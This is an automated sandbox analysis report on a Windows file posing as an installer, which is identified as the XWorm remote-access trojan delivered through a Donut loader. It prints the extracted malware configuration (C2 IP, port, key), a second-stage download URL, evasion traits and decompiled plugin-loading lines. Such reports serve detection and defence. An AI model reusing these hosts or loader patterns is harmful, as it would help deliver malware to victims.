Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
998_popxinv_Installer.exe

Overview

General Information

Sample name:998_popxinv_Installer.exe
Analysis ID:1466320
MD5:a8dc1e962f313cd278b0e648a6674d91
SHA1:dd55bccfc5c30aa9a608b6c6fd10dd392cec82ad
SHA256:1bc92d0988234ee9f52b96fd7ecd8d0b4159d69480581e5f46b2f29ab0f77684
Tags:exe
Infos:

Detection

XWorm
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Machine Learning detection for sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Uses known network protocols on non-standard ports
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (may stop execution after checking a module file name)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • 998_popxinv_Installer.exe (PID: 1564 cmdline: "C:\Users\user\Desktop\998_popxinv_Installer.exe" MD5: A8DC1E962F313CD278B0E648A6674D91)
  • cleanup
{"C2 url": ["134.122.174.169"], "Port": "7000", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
SourceRuleDescriptionAuthorStrings
dump.pcapWindows_Trojan_Donutloader_f40e3759unknownunknown
  • 0x11dcc:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
SourceRuleDescriptionAuthorStrings
C:\Users\Public\Downloads\ind.jpgWindows_Trojan_Donutloader_f40e3759unknownunknown
  • 0xff91:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\998[1].ccpWindows_Trojan_Donutloader_f40e3759unknownunknown
  • 0xff91:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
SourceRuleDescriptionAuthorStrings
00000000.00000002.3870470602.0000000003AD0000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Donutloader_f40e3759unknownunknown
  • 0xff91:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
00000000.00000002.3872605515.0000000005F90000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
    00000000.00000002.3872605515.0000000005F90000.00000004.08000000.00040000.00000000.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
    • 0x6c80:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
    • 0x6d1d:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
    • 0x6e32:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
    • 0x6af2:$cnc4: POST / HTTP/1.1
    Process Memory Space: 998_popxinv_Installer.exe PID: 1564JoeSecurity_XWormYara detected XWormJoe Security
      SourceRuleDescriptionAuthorStrings
      0.2.998_popxinv_Installer.exe.5f90000.1.raw.unpackJoeSecurity_XWormYara detected XWormJoe Security
        0.2.998_popxinv_Installer.exe.5f90000.1.raw.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
        • 0x6c80:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
        • 0x6d1d:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
        • 0x6e32:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
        • 0x6af2:$cnc4: POST / HTTP/1.1
        0.2.998_popxinv_Installer.exe.5f90000.1.unpackJoeSecurity_XWormYara detected XWormJoe Security
          0.2.998_popxinv_Installer.exe.5f90000.1.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
          • 0x4e80:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
          • 0x4f1d:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
          • 0x5032:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
          • 0x4cf2:$cnc4: POST / HTTP/1.1
          No Sigma rule has matched
          Timestamp:07/02/24-19:31:18.778371
          SID:2853193
          Source Port:49749
          Destination Port:7000
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:07/02/24-19:29:42.015000
          SID:2855924
          Source Port:49729
          Destination Port:7000
          Protocol:TCP
          Classtype:A Network Trojan was detected

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: 00000000.00000002.3871104262.0000000003D51000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Xworm {"C2 url": ["134.122.174.169"], "Port": "7000", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
          Source: 998_popxinv_Installer.exeReversingLabs: Detection: 21%
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
          Source: 998_popxinv_Installer.exeJoe Sandbox ML: detected
          Source: 0.2.998_popxinv_Installer.exe.5f90000.1.raw.unpackString decryptor: 134.122.174.169
          Source: 0.2.998_popxinv_Installer.exe.5f90000.1.raw.unpackString decryptor: 7000
          Source: 0.2.998_popxinv_Installer.exe.5f90000.1.raw.unpackString decryptor: <123456789>
          Source: 0.2.998_popxinv_Installer.exe.5f90000.1.raw.unpackString decryptor: <Xwormmm>
          Source: 0.2.998_popxinv_Installer.exe.5f90000.1.raw.unpackString decryptor: XWorm V5.6
          Source: 0.2.998_popxinv_Installer.exe.5f90000.1.raw.unpackString decryptor: USB.exe
          Source: 998_popxinv_Installer.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: 998_popxinv_Installer.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

          Networking

          barindex
          Source: TrafficSnort IDS: 2855924 ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound 192.168.2.8:49729 -> 134.122.174.169:7000
          Source: TrafficSnort IDS: 2853193 ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound 192.168.2.8:49749 -> 134.122.174.169:7000
          Source: Malware configuration extractorURLs: 134.122.174.169
          Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 881
          Source: unknownNetwork traffic detected: HTTP traffic on port 881 -> 49704
          Source: global trafficTCP traffic: 192.168.2.8:49704 -> 91.208.240.157:881
          Source: global trafficTCP traffic: 192.168.2.8:49705 -> 134.122.174.169:7000
          Source: Joe Sandbox ViewIP Address: 91.208.240.157 91.208.240.157
          Source: Joe Sandbox ViewASN Name: BCPL-SGBGPNETGlobalASNSG BCPL-SGBGPNETGlobalASNSG
          Source: unknownTCP traffic detected without corresponding DNS query: 134.122.174.169
          Source: unknownTCP traffic detected without corresponding DNS query: 134.122.174.169
          Source: unknownTCP traffic detected without corresponding DNS query: 134.122.174.169
          Source: unknownTCP traffic detected without corresponding DNS query: 134.122.174.169
          Source: unknownTCP traffic detected without corresponding DNS query: 134.122.174.169
          Source: unknownTCP traffic detected without corresponding DNS query: 134.122.174.169
          Source: unknownTCP traffic detected without corresponding DNS query: 134.122.174.169
          Source: unknownTCP traffic detected without corresponding DNS query: 134.122.174.169
          Source: unknownTCP traffic detected without corresponding DNS query: 134.122.174.169
          Source: unknownTCP traffic detected without corresponding DNS query: 134.122.174.169
          Source: unknownTCP traffic detected without corresponding DNS query: 134.122.174.169
          Source: unknownTCP traffic detected without corresponding DNS query: 134.122.174.169
          Source: unknownTCP traffic detected without corresponding DNS query: 134.122.174.169
          Source: unknownTCP traffic detected without corresponding DNS query: 134.122.174.169
          Source: unknownTCP traffic detected without corresponding DNS query: 134.122.174.169
          Source: unknownTCP traffic detected without corresponding DNS query: 134.122.174.169
          Source: unknownTCP traffic detected without corresponding DNS query: 134.122.174.169
          Source: unknownTCP traffic detected without corresponding DNS query: 134.122.174.169
          Source: unknownTCP traffic detected without corresponding DNS query: 134.122.174.169
          Source: unknownTCP traffic detected without corresponding DNS query: 134.122.174.169
          Source: unknownTCP traffic detected without corresponding DNS query: 134.122.174.169
          Source: unknownTCP traffic detected without corresponding DNS query: 134.122.174.169
          Source: unknownTCP traffic detected without corresponding DNS query: 134.122.174.169
          Source: unknownTCP traffic detected without corresponding DNS query: 134.122.174.169
          Source: unknownTCP traffic detected without corresponding DNS query: 134.122.174.169
          Source: unknownTCP traffic detected without corresponding DNS query: 134.122.174.169
          Source: unknownTCP traffic detected without corresponding DNS query: 134.122.174.169
          Source: unknownTCP traffic detected without corresponding DNS query: 134.122.174.169
          Source: unknownTCP traffic detected without corresponding DNS query: 134.122.174.169
          Source: unknownTCP traffic detected without corresponding DNS query: 134.122.174.169
          Source: unknownTCP traffic detected without corresponding DNS query: 134.122.174.169
          Source: unknownTCP traffic detected without corresponding DNS query: 134.122.174.169
          Source: unknownTCP traffic detected without corresponding DNS query: 134.122.174.169
          Source: unknownTCP traffic detected without corresponding DNS query: 134.122.174.169
          Source: unknownTCP traffic detected without corresponding DNS query: 134.122.174.169
          Source: unknownTCP traffic detected without corresponding DNS query: 134.122.174.169
          Source: unknownTCP traffic detected without corresponding DNS query: 134.122.174.169
          Source: unknownTCP traffic detected without corresponding DNS query: 134.122.174.169
          Source: unknownTCP traffic detected without corresponding DNS query: 134.122.174.169
          Source: unknownTCP traffic detected without corresponding DNS query: 134.122.174.169
          Source: unknownTCP traffic detected without corresponding DNS query: 134.122.174.169
          Source: unknownTCP traffic detected without corresponding DNS query: 134.122.174.169
          Source: unknownTCP traffic detected without corresponding DNS query: 134.122.174.169
          Source: unknownTCP traffic detected without corresponding DNS query: 134.122.174.169
          Source: unknownTCP traffic detected without corresponding DNS query: 134.122.174.169
          Source: unknownTCP traffic detected without corresponding DNS query: 134.122.174.169
          Source: unknownTCP traffic detected without corresponding DNS query: 134.122.174.169
          Source: unknownTCP traffic detected without corresponding DNS query: 134.122.174.169
          Source: unknownTCP traffic detected without corresponding DNS query: 134.122.174.169
          Source: unknownTCP traffic detected without corresponding DNS query: 134.122.174.169
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeCode function: 0_2_00A125C5 __EH_prolog,InternetReadFile,0_2_00A125C5
          Source: global trafficHTTP traffic detected: GET /998.ccp HTTP/1.1User-Agent: DownloadHost: guanlix.cn:881Cache-Control: no-cache
          Source: global trafficDNS traffic detected: DNS query: guanlix.cn
          Source: 998_popxinv_Installer.exeString found in binary or memory: http://guanlix.cn:881/998.ccp
          Source: 998_popxinv_Installer.exe, 00000000.00000002.3869480227.00000000013DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://guanlix.cn:881/998.ccpS
          Source: 998_popxinv_Installer.exe, 00000000.00000002.3871104262.0000000003D51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name

          System Summary

          barindex
          Source: dump.pcap, type: PCAPMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
          Source: 0.2.998_popxinv_Installer.exe.5f90000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
          Source: 0.2.998_popxinv_Installer.exe.5f90000.1.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
          Source: 00000000.00000002.3870470602.0000000003AD0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
          Source: 00000000.00000002.3872605515.0000000005F90000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
          Source: C:\Users\Public\Downloads\ind.jpg, type: DROPPEDMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\998[1].ccp, type: DROPPEDMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeProcess Stats: CPU usage > 49%
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeCode function: 0_2_00A2007E0_2_00A2007E
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeCode function: 0_2_00A25A2A0_2_00A25A2A
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeCode function: 0_2_00A2738F0_2_00A2738F
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeCode function: 0_2_00A1FBE90_2_00A1FBE9
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeCode function: 0_2_00A20BD60_2_00A20BD6
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeCode function: 0_2_00A254D90_2_00A254D9
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeCode function: 0_2_00A2041C0_2_00A2041C
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeCode function: 0_2_00A266570_2_00A26657
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeCode function: 0_2_00A207EE0_2_00A207EE
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeCode function: 0_2_00A25F7B0_2_00A25F7B
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeCode function: 0_2_00A27F4F0_2_00A27F4F
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeCode function: 0_2_05FA55D80_2_05FA55D8
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeCode function: 0_2_05FA4D080_2_05FA4D08
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeCode function: 0_2_05FA07A00_2_05FA07A0
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeCode function: 0_2_05FA49C00_2_05FA49C0
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeCode function: String function: 00A1A9B0 appears 45 times
          Source: 998_popxinv_Installer.exe, 00000000.00000000.1407204265.0000000000A33000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamewindos.exe. vs 998_popxinv_Installer.exe
          Source: 998_popxinv_Installer.exe, 00000000.00000002.3872605515.0000000005F90000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameXClient.exe4 vs 998_popxinv_Installer.exe
          Source: 998_popxinv_Installer.exeBinary or memory string: OriginalFilenamewindos.exe. vs 998_popxinv_Installer.exe
          Source: 998_popxinv_Installer.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: dump.pcap, type: PCAPMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
          Source: 0.2.998_popxinv_Installer.exe.5f90000.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
          Source: 0.2.998_popxinv_Installer.exe.5f90000.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
          Source: 00000000.00000002.3870470602.0000000003AD0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
          Source: 00000000.00000002.3872605515.0000000005F90000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
          Source: C:\Users\Public\Downloads\ind.jpg, type: DROPPEDMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\998[1].ccp, type: DROPPEDMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
          Source: 0.2.998_popxinv_Installer.exe.5f90000.1.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
          Source: 0.2.998_popxinv_Installer.exe.5f90000.1.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
          Source: 0.2.998_popxinv_Installer.exe.5f90000.1.raw.unpack, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
          Source: classification engineClassification label: mal100.troj.evad.winEXE@1/2@1/2
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\998[1].ccpJump to behavior
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeMutant created: NULL
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeMutant created: \Sessions\1\BaseNamedObjects\8M3hFSmRgZDf09wt
          Source: 998_popxinv_Installer.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: 998_popxinv_Installer.exeReversingLabs: Detection: 21%
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeSection loaded: winmm.dllJump to behavior
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeSection loaded: winmm.dllJump to behavior
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
          Source: 998_popxinv_Installer.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
          Source: 998_popxinv_Installer.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
          Source: 998_popxinv_Installer.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
          Source: 998_popxinv_Installer.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
          Source: 998_popxinv_Installer.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
          Source: 998_popxinv_Installer.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

          Data Obfuscation

          barindex
          Source: 0.2.998_popxinv_Installer.exe.5f90000.1.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
          Source: 0.2.998_popxinv_Installer.exe.5f90000.1.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
          Source: 0.2.998_popxinv_Installer.exe.5f90000.1.raw.unpack, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
          Source: 0.2.998_popxinv_Installer.exe.5f90000.1.raw.unpack, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
          Source: 0.2.998_popxinv_Installer.exe.5f90000.1.raw.unpack, Messages.cs.Net Code: Memory
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeCode function: 0_2_00A240E4 LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_00A240E4
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeCode function: 0_2_00A1A9F5 push ecx; ret 0_2_00A1AA08
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeCode function: 0_2_00A14948 push eax; ret 0_2_00A14966
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeCode function: 0_2_00A16649 push ecx; ret 0_2_00A1665C
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeCode function: 0_2_05FA7550 push es; ret 0_2_05FA7560
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeCode function: 0_2_05FA6B88 pushad ; ret 0_2_05FA6B89

          Hooking and other Techniques for Hiding and Protection

          barindex
          Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 881
          Source: unknownNetwork traffic detected: HTTP traffic on port 881 -> 49704
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
